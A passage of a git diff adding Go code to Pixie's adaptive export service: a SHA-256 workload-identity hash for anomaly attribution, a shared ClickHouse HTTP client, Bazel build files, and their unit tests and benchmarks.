seen := false + for _, k := range d.Added { + if k.Pod == "racy" { + seen = true + } + } + if !seen { + t.Fatalf("racy pod not in delta added=%v", d.Added) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("no delta within 500ms") + } +} + +func TestConcurrentUpsertsAreSafe(t *testing.T) { + s := New() + var wg sync.WaitGroup + for i := 0; i < 50; i++ { + i := i + wg.Add(1) + go func() { + defer wg.Done() + s.Upsert(Key{Pod: string(rune('a' + (i % 26)))}, time.Now().Add(time.Minute)) + }() + } + wg.Wait() + if s.Size() == 0 { + t.Fatalf("size 0 after 50 concurrent upserts") + } +} + +func TestRenderKey(t *testing.T) { + if got := (Key{Namespace: "n", Pod: "p"}).Render(); got != "n/p" { + t.Fatalf("render = %q, want n/p", got) + } + if got := (Key{Pod: "p"}).Render(); got != "p" { + t.Fatalf("render(no ns) = %q, want p", got) + } +} diff --git a/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel b/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel new file mode 100644 index 00000000000..8f0d97ac68c --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel @@ -0,0 +1,34 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "anomaly", + srcs = ["hash.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], +) + +pl_go_test( + name = "anomaly_test", + srcs = [ + "hash_bench_test.go", + "hash_test.go", + ], + embed = [":anomaly"], +) diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash.go b/src/vizier/services/adaptive_export/internal/anomaly/hash.go new file mode 100644 index 00000000000..0a0bbaac613 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/hash.go @@ -0,0 +1,86 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package anomaly defines the source-agnostic identity of one anomaly +// observation: a four-field Target and the deterministic AnomalyHash +// derived from it. +// +// AnomalyHash is the join key written by the operator into +// forensic_db.adaptive_attribution and joined against pixie observation +// tables on (hostname, namespace, pod, time_). +// +// The hash is workload-identity, NOT event-identity: it carries no +// timestamp and no rule id. The same workload firing N anomalies +// produces N kubescape rows, all collapsing to the same hash. This +// makes the hash a meaningful partition / join key. +package anomaly + +import ( + "crypto/sha256" + "encoding/binary" + "encoding/hex" +) + +// AnomalyHash is the 32-hex-character (16-byte) join key derived from +// a Target. Same Target → same AnomalyHash, every time. +type AnomalyHash string + +// Target is the workload-identity used for hashing. Pod and Namespace +// MAY be empty (host-pid processes outside any pod). PID + Comm are +// always required by the producer; the hash function does not enforce +// that — extraction is the place to enforce. +// +// Note: timestamp and rule id deliberately not in the hash. Different +// rule firings on the same workload share the same hash; the time +// dimension is carried separately in the attribution row's +// (t_start, t_end) interval. +type Target struct { + PID uint64 + Comm string + Pod string // may be empty + Namespace string // may be empty +} + +// Hash returns the deterministic 32-hex-character AnomalyHash for the +// given Target. SHA-256 over a length-prefixed canonical encoding of +// the four identity fields, truncated to the leading 16 bytes +// (32 hex chars). 128 collision bits suffice for the workload +// cardinality envelope. +// +// The encoding is: PID as big-endian uint64, followed by each string +// as uint32-LE length || bytes. Length prefixing is collision-safe +// across delimiter-bearing or empty inputs (a plain ":"-join is not — +// e.g. {Pod:"a:b", NS:""} would collide with {Pod:"a", NS:"b:"}). +func Hash(t Target) AnomalyHash { + h := sha256.New() + var pidBuf [8]byte + binary.BigEndian.PutUint64(pidBuf[:], t.PID) + h.Write(pidBuf[:]) + writeLenPrefixed(h, t.Comm) + writeLenPrefixed(h, t.Pod) + writeLenPrefixed(h, t.Namespace) + sum := h.Sum(nil) + return AnomalyHash(hex.EncodeToString(sum[:16])) +} + +// writeLenPrefixed writes uint32-LE length followed by the raw bytes. +// 4 GiB per field is well above any realistic Pod/Namespace/Comm size. +func writeLenPrefixed(h interface{ Write([]byte) (int, error) }, s string) { + var lenBuf [4]byte + binary.LittleEndian.PutUint32(lenBuf[:], uint32(len(s))) + _, _ = h.Write(lenBuf[:]) + _, _ = h.Write([]byte(s)) +} diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash_bench_test.go b/src/vizier/services/adaptive_export/internal/anomaly/hash_bench_test.go new file mode 100644 index 00000000000..74d0e8d0b75 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/hash_bench_test.go @@ -0,0 +1,119 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package anomaly + +import ( + "fmt" + "sync/atomic" + "testing" +) + +// anomaly.Hash sits on the HOTTEST path in AE: it runs for every +// kubescape event the trigger fans into the controller. At ~1k +// events/sec on a busy cluster, that's 1k Hash() calls/sec PLUS the +// kubescape extraction allocations on each upstream Row. +// +// These benchmarks establish the per-call cost. The fields are sized +// to match real workloads: Pod is the standard 51-char k8s name, +// Namespace ~20 chars, Comm 16 chars (max kernel limit). + +func benchTarget(i int) Target { + return Target{ + PID: uint64(1000 + i), + Comm: "java", + Pod: "backend-vulnerable-779cd9d765-mxr8t-replica-shard-9", + Namespace: "log4j-poc-production", + } +} + +func BenchmarkHash(b *testing.B) { + t := benchTarget(0) + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _ = Hash(t) + } +} + +// BenchmarkHash_Unique varies the PID each iteration. Establishes +// what the hash costs when the inputs aren't shared across calls (so +// no CPU caching shortcut on the input bytes). +func BenchmarkHash_Unique(b *testing.B) { + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _ = Hash(benchTarget(i)) + } +} + +// BenchmarkHash_LongNamespace pumps the fields to their realistic +// upper bound (256-char Pod, 63-char namespace per k8s DNS limits). +// Shows whether the SHA-256 step or the writeLenPrefixed allocations +// dominate. +func BenchmarkHash_LongFields(b *testing.B) { + t := Target{ + PID: 12345, + Comm: "very-long-process-name-near-kernel-limit-16chrs!", + Pod: "extremely-long-statefulset-pod-name-with-replica-suffix-and-shard-suffix-pushing-the-k8s-253-char-dns-limit-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + Namespace: "production-tenant-namespace-63-chars-aaaaaaaaaaaaaaaaaaaaaaaaa", + } + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _ = Hash(t) + } +} + +// BenchmarkHash_Parallel measures contention under GOMAXPROCS +// goroutines computing hashes in parallel. AE on a busy cluster has +// 11 BatchWriter + 11 TableScanner streaming goroutines plus the +// controller fan-out; if Hash's sha256.New() or its hex.EncodeToString +// hit a shared allocator pool, parallel speedup will collapse. +func BenchmarkHash_Parallel(b *testing.B) { + b.ReportAllocs() + b.ResetTimer() + var i atomic.Uint64 + b.RunParallel(func(pb *testing.PB) { + for pb.Next() { + _ = Hash(benchTarget(int(i.Add(1)))) + } + }) +} + +// BenchmarkHash_KubescapeReplay simulates the trigger-controller +// fan-out: drain a batch of 10k events (the configured PollLimit +// default) by hashing each one's target. Measures the per-batch +// hash cost — call once per trigger poll on a busy cluster. +func BenchmarkHash_KubescapeReplay(b *testing.B) { + const batch = 10_000 + targets := make([]Target, batch) + for i := range targets { + targets[i] = Target{ + PID: uint64(1000 + i), + Comm: fmt.Sprintf("proc-%d", i%64), + Pod: fmt.Sprintf("backend-%d-7bdf99c466-replica-%d", i%32, i%4), + Namespace: fmt.Sprintf("ns-%d", i%8), + } + } + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + for j := range targets { + _ = Hash(targets[j]) + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go b/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go new file mode 100644 index 00000000000..360f3422928 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go @@ -0,0 +1,140 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package anomaly + +import ( + "reflect" + "testing" +) + +// canonical fixture: redis CVE-2025-49844 R1005 alert (workload identity only). +var canonicalTarget = Target{ + PID: 106040, + Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", + Namespace: "redis", +} + +// TestHash_Deterministic — same Target hashes identically every call. +func TestHash_Deterministic(t *testing.T) { + a := Hash(canonicalTarget) + b := Hash(canonicalTarget) + if a != b { + t.Fatalf("not deterministic: %q vs %q", a, b) + } + if got := len(a); got != 32 { + t.Fatalf("len %d, want 32 hex chars", got) + } +} + +// TestHash_DiffersOnPID — two processes on the same pod still hash differently +// (we want PER-process attribution). +func TestHash_DiffersOnPID(t *testing.T) { + other := canonicalTarget + other.PID = canonicalTarget.PID + 1 + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on PID change") + } +} + +// TestHash_DiffersOnComm — different comm under same PID/pod/ns must differ. +func TestHash_DiffersOnComm(t *testing.T) { + other := canonicalTarget + other.Comm = "redis-cli" + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on Comm change") + } +} + +// TestHash_DiffersOnPod — different replicas of same workload differ. +func TestHash_DiffersOnPod(t *testing.T) { + other := canonicalTarget + other.Pod = "redis-578d5dc9bd-OTHER" + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on Pod change") + } +} + +// TestHash_DiffersOnNamespace — same pod name in different ns must differ. +func TestHash_DiffersOnNamespace(t *testing.T) { + other := canonicalTarget + other.Namespace = "redis-staging" + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on Namespace change") + } +} + +// TestHash_AllowsEmptyPod — host-pid processes have no pod/namespace. +// Hash must still be computable and stable. +func TestHash_AllowsEmptyPod(t *testing.T) { + host := Target{PID: 1, Comm: "systemd"} + a := Hash(host) + b := Hash(host) + if a != b { + t.Fatalf("empty-pod hash not deterministic") + } + if len(a) != 32 { + t.Fatalf("empty-pod hash len %d", len(a)) + } + // empty-pod target must collide with itself but not with the + // non-empty-pod canonical target. + if a == Hash(canonicalTarget) { + t.Fatalf("empty-pod hash collides with named-pod hash") + } +} + +// TestHash_NoTimestampInfluence — verifies the hash function takes only +// the four identity fields. (No EventTime / RuleID parameter exists.) +// This is a structural test: the Target struct has exactly 4 fields, +// all part of the canonical form. If you add a field, you must decide +// whether it belongs in the hash and update this test. +func TestHash_NoTimestampInfluence(t *testing.T) { + // Pin the shape so adding a new field (even at zero value) makes + // this test fail loudly. CR feedback: an equality-of-two-equal- + // constructions check would pass even when a new field is added, + // so we also assert the type's field count. + const wantFields = 4 + if got := reflect.TypeOf(Target{}).NumField(); got != wantFields { + t.Fatalf("Target field count = %d, want %d; decide whether the new "+ + "field belongs in the canonical hash form (update Hash + this guard)", + got, wantFields) + } + a := Target{PID: 1, Comm: "x", Pod: "p", Namespace: "n"} + if Hash(a) != Hash(Target{PID: 1, Comm: "x", Pod: "p", Namespace: "n"}) { + t.Fatalf("Target hash leaks an unrecognised field") + } +} + +// TestHash_NoDelimiterCollision — naive ":"-joined canonical forms +// collide when input values can contain ":" or be empty. The fix is a +// length-prefixed (or otherwise delimiter-safe) encoding before hashing. +// Without that fix, the two Targets below produce the same canonical +// string and therefore the same hash. +func TestHash_NoDelimiterCollision(t *testing.T) { + a := Target{PID: 0, Comm: "", Pod: "a:b", Namespace: ""} + b := Target{PID: 0, Comm: "", Pod: "a", Namespace: "b:"} + if Hash(a) == Hash(b) { + t.Fatalf("delimiter collision: %+v and %+v hash to the same value (%s)", + a, b, Hash(a)) + } + c := Target{PID: 0, Comm: "x:y", Pod: "", Namespace: ""} + d := Target{PID: 0, Comm: "x", Pod: "y:", Namespace: ""} + if Hash(c) == Hash(d) { + t.Fatalf("delimiter collision: %+v and %+v hash to the same value (%s)", + c, d, Hash(c)) + } +} diff --git a/src/vizier/services/adaptive_export/internal/chhttp/BUILD.bazel b/src/vizier/services/adaptive_export/internal/chhttp/BUILD.bazel new file mode 100644 index 00000000000..a52c1c89c32 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/chhttp/BUILD.bazel @@ -0,0 +1,31 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "chhttp", + srcs = ["chhttp.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], +) + +pl_go_test( + name = "chhttp_test", + srcs = ["chhttp_test.go"], + embed = [":chhttp"], +) diff --git a/src/vizier/services/adaptive_export/internal/chhttp/chhttp.go b/src/vizier/services/adaptive_export/internal/chhttp/chhttp.go new file mode 100644 index 00000000000..d96b784c7e7 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/chhttp/chhttp.go @@ -0,0 +1,232 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package chhttp is the one HTTP client every AE-internal package uses to +// talk to ClickHouse's HTTP interface (port 8123 by default). Previously +// the same client was reimplemented three times (clickhouse.Applier, +// sink.ClickHouseHTTP, trigger.ClickHouseWatermarkStore) with subtly +// different endpoint validation, timeout defaults and error-extraction +// logic; this package collapses that to a single implementation. +package chhttp + +import ( + "bytes" + "context" + "fmt" + "io" + "net/http" + "net/url" + "strings" + "time" +) + +// DefaultTimeout is applied when New is called with timeout==0. Matches +// the budget the original three clients each chose independently. +const DefaultTimeout = 30 * time.Second + +// Client is a minimal HTTP CH client. Safe for concurrent use. +type Client struct { + endpoint string + user string + pass string + hc *http.Client +} + +// New validates the endpoint and returns a ready client. timeout<=0 → +// DefaultTimeout. endpoint must be an absolute http(s) URL with no query +// string or fragment (we append ?query=… ourselves); trailing slashes +// are stripped so concatenations don't produce //. +func New(endpoint, user, pass string, timeout time.Duration) (*Client, error) { + if endpoint == "" { + return nil, fmt.Errorf("chhttp: empty endpoint") + } + u, err := url.Parse(endpoint) + if err != nil { + return nil, fmt.Errorf("chhttp: invalid endpoint %q: %w", endpoint, err) + } + if (u.Scheme != "http" && u.Scheme != "https") || u.Host == "" { + return nil, fmt.Errorf("chhttp: endpoint must be an absolute http(s) URL: %q", endpoint) + } + if u.RawQuery != "" || u.Fragment != "" { + return nil, fmt.Errorf("chhttp: endpoint must not include query parameters or a fragment: %q", endpoint) + } + if timeout <= 0 { + timeout = DefaultTimeout + } + return &Client{ + endpoint: strings.TrimRight(endpoint, "/"), + user: user, + pass: pass, + hc: &http.Client{Timeout: timeout}, + }, nil +} + +// Endpoint returns the (validated, trimmed) base URL — useful for log +// fields where the caller wants to identify which CH the client targets. +func (c *Client) Endpoint() string { return c.endpoint } + +// Exec POSTs sql as the request body (DDL / DML without source data). Returns +// the response body bytes. Use for CREATE DATABASE, CREATE TABLE, etc. +func (c *Client) Exec(ctx context.Context, sql string) ([]byte, error) { + return c.do(ctx, http.MethodPost, c.endpoint+"/", strings.NewReader(sql), "") +} + +// Query GETs sql via ?query= so it shows up greppable in CH's query log. +// Use for SELECT — the body is whatever FORMAT was requested. Buffers +// the entire response in memory; for large result sets prefer +// QueryStream. +func (c *Client) Query(ctx context.Context, sql string) ([]byte, error) { + q := url.Values{} + q.Set("query", sql) + return c.do(ctx, http.MethodGet, c.endpoint+"/?"+q.Encode(), nil, "") +} + +// QueryStream GETs sql like Query, but returns the response body as an +// io.ReadCloser the caller drains incrementally. Use for SELECTs whose +// result set is unbounded (e.g. an active-set rehydrate that may be +// multi-MB). Caller MUST Close the returned body, even on error. +func (c *Client) QueryStream(ctx context.Context, sql string) (io.ReadCloser, error) { + q := url.Values{} + q.Set("query", sql) + req, err := http.NewRequestWithContext(ctx, http.MethodGet, c.endpoint+"/?"+q.Encode(), nil) + if err != nil { + return nil, err + } + if c.user != "" { + req.SetBasicAuth(c.user, c.pass) + } + resp, err := c.hc.Do(req) + if err != nil { + return nil, err + } + if resp.StatusCode/100 != 2 { + msg, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + resp.Body.Close() + return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(msg))) + } + return resp.Body, nil +} + +// InsertOptions tunes one Insert call. +type InsertOptions struct { + // ContentType sets the HTTP Content-Type. Defaults to + // "application/x-ndjson" when empty (matches FORMAT JSONEachRow). + ContentType string + // FailLoud, when true, attaches the CH settings that turn silent + // drops into errors (input_format_skip_unknown_fields=0 etc.) — + // see setFailLoudSettings. + FailLoud bool + // Settings carries additional CH settings as URL params on the + // query string. Keys are passed through unchanged. + Settings url.Values +} + +// InsertResult is what Insert returns on success. +type InsertResult struct { + // Summary is the X-ClickHouse-Summary response header verbatim (may + // be empty — older CH or middlebox stripping). Callers parse for + // silent-drop detection. + Summary string + // BodyBytes is the count of bytes in the request body (not the + // response). Convenient for logging the wire size at the call site. + BodyBytes int +} + +// Insert posts the body for an INSERT … FORMAT X statement (sql contains +// the statement; body contains the data in the named format). The +// per-call options carry content-type + the fail-loud setting. +func (c *Client) Insert(ctx context.Context, sql string, body []byte, opts InsertOptions) (InsertResult, error) { + q := url.Values{} + q.Set("query", sql) + for k, vs := range opts.Settings { + for _, v := range vs { + q.Add(k, v) + } + } + if opts.FailLoud { + setFailLoudSettings(q) + } + ct := opts.ContentType + if ct == "" { + ct = "application/x-ndjson" + } + out, resp, err := c.doRaw(ctx, http.MethodPost, c.endpoint+"/?"+q.Encode(), bytes.NewReader(body), ct) + if err != nil { + return InsertResult{}, err + } + _ = out // discarded: INSERT bodies are empty + return InsertResult{ + Summary: resp.Header.Get("X-ClickHouse-Summary"), + BodyBytes: len(body), + }, nil +} + +// do is the simple variant used by Exec/Query — it discards the response +// headers and only surfaces the body bytes. +func (c *Client) do(ctx context.Context, method, urlStr string, body io.Reader, contentType string) ([]byte, error) { + out, _, err := c.doRaw(ctx, method, urlStr, body, contentType) + return out, err +} + +// doRaw builds + sends one request, returning the body and the response +// (so Insert can read the X-ClickHouse-Summary header). Non-2xx becomes a +// formatted Go error. +func (c *Client) doRaw(ctx context.Context, method, urlStr string, body io.Reader, contentType string) ([]byte, *http.Response, error) { + req, err := http.NewRequestWithContext(ctx, method, urlStr, body) + if err != nil { + return nil, nil, err + } + if contentType != "" { + req.Header.Set("Content-Type", contentType) + } + if c.user != "" { + req.SetBasicAuth(c.user, c.pass) + } + resp, err := c.hc.Do(req) + if err != nil { + return nil, nil, err + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + msg, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + return nil, resp, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(msg))) + } + out, err := io.ReadAll(resp.Body) + if err != nil { + return nil, resp, err + } + return out, resp, nil +} + +// setFailLoudSettings pins ClickHouse's input-format settings on every +// INSERT so an upstream schema-drift surfaces as an HTTP 4xx with a real +// error body, not a silent written_rows=0 + 200 OK that downstream +// silent-drop detection only catches after the data is lost. +// +// input_format_skip_unknown_fields=0 fail on a column we write that +// doesn't exist in CH. +// input_format_null_as_default=0 fail on a NULL where the +// column is non-nullable. +// input_format_allow_errors_num=0 reject the whole batch on +// the first parse error. +// input_format_allow_errors_ratio=0 same, for the proportional +// knob. +func setFailLoudSettings(q url.Values) { + q.Set("input_format_skip_unknown_fields", "0") + q.Set("input_format_null_as_default", "0") + q.Set("input_format_allow_errors_num", "0") + q.Set("input_format_allow_errors_ratio", "0") +} diff --git a/src/vizier/services/adaptive_export/internal/chhttp/chhttp_test.go b/src/vizier/services/adaptive_export/internal/chhttp/chhttp_test.go new file mode 100644 index 00000000000..28664911a14 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/chhttp/chhttp_test.go @@ -0,0 +1,184 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package chhttp + +import ( + "context" + "io" + "net/http" + "net/http/httptest" + "strings" + "testing" + "time" +) + +func TestNew_RejectsBadEndpoints(t *testing.T) { + for _, tc := range []struct { + name, ep string + }{ + {"empty", ""}, + {"no-scheme", "localhost:8123"}, + {"unsupported-scheme", "ftp://localhost:8123"}, + {"has-query", "http://localhost:8123/?foo=bar"}, + {"has-fragment", "http://localhost:8123/#bar"}, + } { + t.Run(tc.name, func(t *testing.T) { + if _, err := New(tc.ep, "", "", 0); err == nil { + t.Fatalf("New(%q) = nil err, want error", tc.ep) + } + }) + } +} + +func TestNew_DefaultsTimeout(t *testing.T) { + c, err := New("http://localhost:8123", "", "", 0) + if err != nil { + t.Fatalf("New: %v", err) + } + if c.hc.Timeout != DefaultTimeout { + t.Fatalf("timeout = %v, want %v", c.hc.Timeout, DefaultTimeout) + } +} + +func TestNew_StripsTrailingSlashFromEndpoint(t *testing.T) { + c, err := New("http://localhost:8123/", "", "", 0) + if err != nil { + t.Fatalf("New: %v", err) + } + if c.Endpoint() != "http://localhost:8123" { + t.Fatalf("endpoint = %q, want trimmed", c.Endpoint()) + } +} + +func TestExec_PostsSQLAsBody(t *testing.T) { + var gotBody string + var gotMethod string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotMethod = r.Method + b, _ := io.ReadAll(r.Body) + gotBody = string(b) + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + + c, err := New(srv.URL, "", "", time.Second) + if err != nil { + t.Fatalf("New: %v", err) + } + if _, err := c.Exec(context.Background(), "CREATE DATABASE x"); err != nil { + t.Fatalf("Exec: %v", err) + } + if gotMethod != http.MethodPost { + t.Fatalf("method = %q, want POST", gotMethod) + } + if gotBody != "CREATE DATABASE x" { + t.Fatalf("body = %q, want %q", gotBody, "CREATE DATABASE x") + } +} + +func TestQuery_PutsSQLInURLParam(t *testing.T) { + var gotMethod, gotQuery string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotMethod = r.Method + gotQuery = r.URL.Query().Get("query") + _, _ = w.Write([]byte(`{"hits":1}` + "\n")) + })) + defer srv.Close() + + c, _ := New(srv.URL, "", "", time.Second) + body, err := c.Query(context.Background(), "SELECT 1") + if err != nil { + t.Fatalf("Query: %v", err) + } + if gotMethod != http.MethodGet { + t.Fatalf("method = %q, want GET", gotMethod) + } + if gotQuery != "SELECT 1" { + t.Fatalf("query = %q, want %q", gotQuery, "SELECT 1") + } + if !strings.Contains(string(body), "hits") { + t.Fatalf("body = %q", body) + } +} + +func TestInsert_SetsContentTypeAndFailLoud(t *testing.T) { + var gotCT, gotQ string + gotSettings := map[string]string{} + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotCT = r.Header.Get("Content-Type") + gotQ = r.URL.Query().Get("query") + for _, k := range []string{"input_format_skip_unknown_fields", "input_format_null_as_default", "input_format_allow_errors_num", "input_format_allow_errors_ratio"} { + gotSettings[k] = r.URL.Query().Get(k) + } + w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"3"}`) + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + + c, _ := New(srv.URL, "", "", time.Second) + res, err := c.Insert(context.Background(), + "INSERT INTO t FORMAT JSONEachRow", []byte("{}\n"), + InsertOptions{FailLoud: true}) + if err != nil { + t.Fatalf("Insert: %v", err) + } + if gotCT != "application/x-ndjson" { + t.Fatalf("content-type = %q", gotCT) + } + if gotQ != "INSERT INTO t FORMAT JSONEachRow" { + t.Fatalf("query = %q", gotQ) + } + if gotSettings["input_format_skip_unknown_fields"] != "0" { + t.Fatalf("fail-loud not applied: %v", gotSettings) + } + if res.Summary != `{"written_rows":"3"}` { + t.Fatalf("summary = %q", res.Summary) + } + if res.BodyBytes != 3 { + t.Fatalf("body bytes = %d", res.BodyBytes) + } +} + +func TestExec_PropagatesNon2xx(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusBadRequest) + _, _ = w.Write([]byte("syntax error near 'GROOT'")) + })) + defer srv.Close() + c, _ := New(srv.URL, "", "", time.Second) + _, err := c.Exec(context.Background(), "GROOT") + if err == nil || !strings.Contains(err.Error(), "HTTP 400") || !strings.Contains(err.Error(), "syntax error") { + t.Fatalf("err = %v", err) + } +} + +func TestExec_SendsBasicAuth(t *testing.T) { + var gotUser, gotPass string + var hadAuth bool + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotUser, gotPass, hadAuth = r.BasicAuth() + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + c, _ := New(srv.URL, "default", "s3cret", time.Second) + if _, err := c.Exec(context.Background(), "SELECT 1"); err != nil { + t.Fatalf("Exec: %v", err) + } + if !hadAuth || gotUser != "default" || gotPass != "s3cret" { + t.Fatalf("basic auth: had=%v user=%q pass=%q", hadAuth, gotUser, gotPass) + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel b/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel new file mode 100644 index 00000000000..b83bc98cad7 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel @@ -0,0 +1,44 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "clickhouse", + srcs = [ + "apply.go", + "ddl.go", + "insert.go", + ], + embedsrcs = ["schema.sql"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/chhttp", + ], +) + +pl_go_test( + name = "clickhouse_test", + srcs = [ + "apply_test.go", + "columns_test.go", + "ddl_test.go", + "insert_test.go", + ], + embed = [":clickhouse"], +) diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/apply.go b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go new file mode 100644 index 00000000000..84b3afbbcb0 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go @@ -0,0 +1,252 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the 